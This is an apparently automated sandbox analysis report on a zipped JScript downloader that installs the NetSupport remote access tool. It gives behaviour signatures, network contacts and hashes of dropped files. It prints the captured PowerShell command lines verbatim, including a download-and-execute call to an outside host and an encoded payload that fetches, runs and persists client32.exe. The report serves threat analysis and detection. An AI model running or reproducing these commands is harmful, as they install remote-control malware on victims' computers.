Malware Analysis Report

2024-10-19 01:40

Sample ID 240208-rvkp7aee7w
Target 08022024_2231_07022024_ARS4254253425425.zip
SHA256 e114869d32aeda56a855e734631e32f5fbcca0682cea3f773f938518a754014a
Tags
netsupport persistence rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

e114869d32aeda56a855e734631e32f5fbcca0682cea3f773f938518a754014a

Threat Level: Known bad

The file 08022024_2231_07022024_ARS4254253425425.zip was found to be: Known bad.

Malicious Activity Summary

netsupport persistence rat

NetSupport

Blocklisted process makes network request

Checks computer location settings

Executes dropped EXE

Loads dropped DLL

Adds Run key to start application

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-02-08 14:30

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-02-08 14:30

Reported

2024-02-08 14:33

Platform

win7-20231215-en

Max time kernel

118s

Max time network

122s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\ARS4254253425425.js

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\ARS4254253425425.js

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (New-Object Net.WebClient).DownloadString('https://assime.ca/command.php')"

Network

Country Destination Domain Proto
US 8.8.8.8:53 assime.ca udp
CA 67.43.225.106:443 assime.ca tcp
CA 67.43.225.106:443 assime.ca tcp

Files

memory/2660-4-0x000000001B250000-0x000000001B532000-memory.dmp

memory/2660-5-0x0000000002590000-0x0000000002598000-memory.dmp

memory/2660-6-0x000007FEF5E80000-0x000007FEF681D000-memory.dmp

memory/2660-7-0x00000000025A0000-0x0000000002620000-memory.dmp

memory/2660-8-0x000007FEF5E80000-0x000007FEF681D000-memory.dmp

memory/2660-9-0x00000000025A0000-0x0000000002620000-memory.dmp

memory/2660-10-0x00000000025A0000-0x0000000002620000-memory.dmp

memory/2660-11-0x00000000025A0000-0x0000000002620000-memory.dmp

memory/2660-12-0x00000000025A0000-0x0000000002620000-memory.dmp

memory/2660-13-0x00000000025A0000-0x0000000002620000-memory.dmp

memory/2660-14-0x000007FEF5E80000-0x000007FEF681D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-02-08 14:30

Reported

2024-02-08 14:33

Platform

win10v2004-20231215-en

Max time kernel

143s

Max time network

151s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\ARS4254253425425.js

Signatures

NetSupport

rat netsupport

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\Control Panel\International\Geo\Nation C:\Windows\system32\wscript.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\modem_gprs_modules = "C:\\Users\\Admin\\AppData\\Local\\modem_gprs_modules\\client32.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.exe N/A

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\ARS4254253425425.js

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (New-Object Net.WebClient).DownloadString('https://assime.ca/command.php')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Nop -ExeCUtIONPol bYPASS -W hI -eNco QwBoAEQASQByACAAJABlAE4AdgA6AEwATwBDAEEAbABhAHAAcABEAGEAVABhADsAIAAkAEcAMgBmAGYAdwAwAGMAPQBbAGIAeQB0AGUAWwBdAF0AQAAoADgAMAAsACAANwA1ACwAIAAzACwAIAA0ACkAOwAgACQAawBuAHMAUABVADIAQQA9ACcAaAB0AHQAcAA6AC8ALwBzAGEAawBhAGwAZQByAGEAbABvAC4AYwBvAG0ALwBjAGMAZQBhADIANgA4AGIALQA4ADcAMQA2AC0ANAA2AGIAZQAtADkAMQA0ADgALQAzAGUANgAxADQAYgAzADgAYQAwAGQAZgAuAHQAeAB0ACcAOwAgACQAMwBsAEsAYwBVAEgAWAA9ACcAagBHAGgAVAB5AG8AaQBDAC4AegBpAHAAJwA7ACAAJABYAEYAeABiADMAPQAnAG0AbwBkAGUAbQBfAGcAcAByAHMAXwBtAG8AZAB1AGwAZQBzACcAOwAgACQARABFAGYAZgBJAFMAPQBpAE4AVgBPAEsAZQAtAFcAZQBCAHIAZQBxAFUAZQBzAHQAIAAtAFUAcgBJACAAJABrAG4AcwBQAFUAMgBBACAALQBVAHMARQBiAEEAcwBJAEMAUABhAFIAUwBJAE4AZwA7ACAAJABCAG0ASgBOAGcANQBmAD0AJABEAEUAZgBmAEkAUwAuAGMAbwBuAFQAZQBOAHQAOwAgACQATgBUADYAVgBPAEUAPQAkAGUATgB2ADoATABPAEMAQQBsAGEAcABwAEQAYQBUAGEALAAgACQAWABGAHgAYgAzACAALQBqAG8AaQBOACAAJwBcACcAOwAgACQAYwBrAGEAdQA4AD0AIgAkAGUATgB2ADoATABPAEMAQQBsAGEAcABwAEQAYQBUAGEAXAAkADMAbABLAGMAVQBIAFgAIgA7ACAAJABQAHgASQBCAFgAcwBvAEYAPQBbAEMAbwBOAFYARQBSAHQAXQA6ADoAZgByAG8AbQBiAGEAUwBlADYANABTAFQAcgBpAE4ARwAoACQAQgBtAEoATgBnADUAZgApADsAIAAkAEgANQBMAHoAawBIAFQAPQAkAFAAeABJAEIAWABzAG8ARgAgAC0AUwBQAGwASQBUACAAJwAgACcAIAAtAEEAcwAgAFsAQgB5AHQARQBbAF0AXQA7ACAAJAAxAFkASwBnAHMAcwBuAD0AJABHADIAZgBmAHcAMABjACsAJABIADUATAB6AGsASABUADsAIABTAGMAIAAkADMAbABLAGMAVQBIAFgAIAAkADEAWQBLAGcAcwBzAG4AIAAtAEUATgBDAG8AZABpAE4AZwAgAEIAWQBUAGUAOwAgAEUAeABwAEEAbgBkAC0AQQBSAEMAaABJAHYAZQAgAC0AcABBAHQAaAAgACQAYwBrAGEAdQA4ACAALQBkAEUAUwBUAGkAbgBBAFQAaQBvAE4AUABhAHQASAAgACQATgBUADYAVgBPAEUAIAAtAGYAbwBSAEMARQA7ACAAUgBJACAAJAAzAGwASwBjAFUASABYADsAIABDAEQAIAAkAE4AVAA2AFYATwBFADsAIAAkAFIAcQBQAHQAUQBkAD0AIgB7ADAAfQBcAGMAbABpAGUAbgB0ADMAMgAuAGUAeABlACIAIAAtAGYAIAAkAE4AVAA2AFYATwBFADsAIABzAHQAYQByAHQAIABjAGwAaQBlAG4AdAAzADIALgBlAHgAZQA7ACAATgBlAHcALQBJAFQARQBtAFAAcgBPAFAARQByAHQAeQAgAC0AUABhAFQASAAgACcASABLAEMAVQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AJwAgAC0ATgBhAE0AZQAgACQAWABGAHgAYgAzACAALQBWAGEATABVAEUAIAAkAFIAcQBQAHQAUQBkACAALQBwAFIAbwBQAGUAcgBUAHkAVABZAFAARQAgACcAUwB0AHIAaQBuAGcAJwA7AA==

C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.exe

"C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.exe"

Network

Country Destination Domain Proto
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 assime.ca udp
CA 67.43.225.106:443 assime.ca tcp
US 8.8.8.8:53 sakaleralo.com udp
DE 192.121.22.184:80 sakaleralo.com tcp
US 8.8.8.8:53 106.225.43.67.in-addr.arpa udp
US 8.8.8.8:53 184.22.121.192.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 createcgroup.com udp
GB 5.61.62.93:443 createcgroup.com tcp
US 8.8.8.8:53 geo.netsupportsoftware.com udp
US 104.26.1.231:80 geo.netsupportsoftware.com tcp
US 8.8.8.8:53 93.62.61.5.in-addr.arpa udp
US 8.8.8.8:53 231.1.26.104.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 16.234.44.23.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 26.178.89.13.in-addr.arpa udp

Files

memory/2300-0-0x000002597B930000-0x000002597B952000-memory.dmp

memory/2300-1-0x00007FFCF1EA0000-0x00007FFCF2961000-memory.dmp

memory/2300-2-0x000002597C050000-0x000002597C060000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fwaftq0m.3lm.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2300-3-0x000002597C050000-0x000002597C060000-memory.dmp

memory/2996-22-0x00007FFCF1EA0000-0x00007FFCF2961000-memory.dmp

memory/2996-24-0x000001F279350000-0x000001F279360000-memory.dmp

memory/2996-23-0x000001F279350000-0x000001F279360000-memory.dmp

memory/2996-26-0x000001F27C080000-0x000001F27C092000-memory.dmp

memory/2996-27-0x000001F27BE30000-0x000001F27BE3A000-memory.dmp

memory/2300-30-0x00007FFCF1EA0000-0x00007FFCF2961000-memory.dmp

C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.exe

MD5 a2b46c59f6e7e395d479b09464ecdba0
SHA1 92c132307dd21189b6d7912ddd934b50e50d1ec1
SHA256 89f0c8f170fe9ea28b1056517160e92e2d7d4e8aa81f4ed696932230413a6ce1
SHA512 4f4479ddcd9d0986aec3d789f9e14f9285e8d9d63a5b8f73c9e3203d3a53cd575b1e15edf0d5f640816bb7f25bd3501244e0f7c181a716a6804742ed2f1cf916

C:\Users\Admin\AppData\Local\modem_gprs_modules\PCICL32.dll

MD5 f4961e1dcc9ca34525a9e66a2787731d
SHA1 308508f833434fbc54d0f246af75edebb0da19c1
SHA256 a2c17891d955b5aa55233eb3a78f6f2298e80fd92526252c93599a037af9f2bf
SHA512 c930962383ee4f7affa0d651503fd6f0b0ac9a1f95f346eab3902c863f548969db097d5a7231b9e537eeebb9149ce1e4dc09e68ee0ae2616c7910c7b02b470ae

C:\Users\Admin\AppData\Local\modem_gprs_modules\PCICL32.DLL

MD5 3524d668ae98cb143948d547e07a43ad
SHA1 630b1081e7aa69bdbd5a9fbeb86bc6268b1b2b8e
SHA256 fc1baab6d5960b56d427ac0e54c4f53ef3bafb7eee5d16ff457ea125ec3b3ba6
SHA512 10dbfa2a855bc65a25dbb439e040b71291cdc375c91485049c71db1c84325f1c3c6f21c57ec266f262dc480e3fc6da445f2acd3a28d5563038e0ae5daffaf7ad

C:\Users\Admin\AppData\Local\modem_gprs_modules\pcichek.dll

MD5 a0b9388c5f18e27266a31f8c5765b263
SHA1 906f7e94f841d464d4da144f7c858fa2160e36db
SHA256 313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a
SHA512 6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd

C:\Users\Admin\AppData\Local\modem_gprs_modules\PCICAPI.dll

MD5 dcde2248d19c778a41aa165866dd52d0
SHA1 7ec84be84fe23f0b0093b647538737e1f19ebb03
SHA256 9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917
SHA512 c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166

memory/2996-70-0x00007FFCF1EA0000-0x00007FFCF2961000-memory.dmp

C:\Users\Admin\AppData\Local\modem_gprs_modules\msvcr100.dll

MD5 0e37fbfa79d349d672456923ec5fbbe3
SHA1 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA256 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA512 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 512c6cab650bfda6ef2995f6b515ed6f
SHA1 fec40abf4f5d74ea7f8828cee83770e423203083
SHA256 84871d83ecd410fb4ddede63061d9c521d876d47a8ffdbb8609378447ba0d262
SHA512 638fffef25de1c3e850eb4f4668c4fdafed7bde042b130325daf323b45d2784916381b410219473b5bbacb4c11c6b8b7ab892b3d5695edb0b0a0785233e8e19b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a2b24af1492f112d2e53cb7415fda39f
SHA1 dbfcee57242a14b60997bd03379cc60198976d85
SHA256 fa05674c1db3386cf01ba1db5a3e9aeb97e15d1720d82988f573bf9743adc073
SHA512 9919077b8e5c7a955682e9a83f6d7ab34ac6a10a3d65af172734d753a48f7604a95739933b8680289c94b4e271b27c775d015b8d9678db277f498d8450b8aff0

C:\Users\Admin\AppData\Local\modem_gprs_modules\NSM.LIC

MD5 866c96ba2823ac5fe70130dfaaa08531
SHA1 892a656da1ea264c73082da8c6e5f5728abcb861
SHA256 6a7c99e4bd767433c25d6df8df81baa99c05dd24fa064e45c306ff4d954e1921
SHA512 0dafc66222bbfcb1558d9845ee4ddeb7a687561b08b86a07b66b120c22952a8082e041d9234d9c69c8ade5d4dae894d3f10afd7ba6dd3f057a08fb5d57c42112

C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.ini

MD5 2cd1a8115b7328756129052384e2eed6
SHA1 9458e9553d3d1f075ed09a06fda3f36136781704
SHA256 02ab893e7d31d7c3b18d27c3c4ef6e056da27cc6ad7efa76b8d4729403a067d2
SHA512 df5630c14f1400166ecbf0854a48616c939c0467634c427f8a287edc5c064c0d259b1cec0b02ae7aa31e21d1609ff31f4e11285160323f2c24fcb02de4e20455

C:\Users\Admin\AppData\Local\modem_gprs_modules\HTCTL32.DLL

MD5 2d3b207c8a48148296156e5725426c7f
SHA1 ad464eb7cf5c19c8a443ab5b590440b32dbc618f
SHA256 edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796
SHA512 55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c

memory/2300-86-0x00007FFCF1EA0000-0x00007FFCF2961000-memory.dmp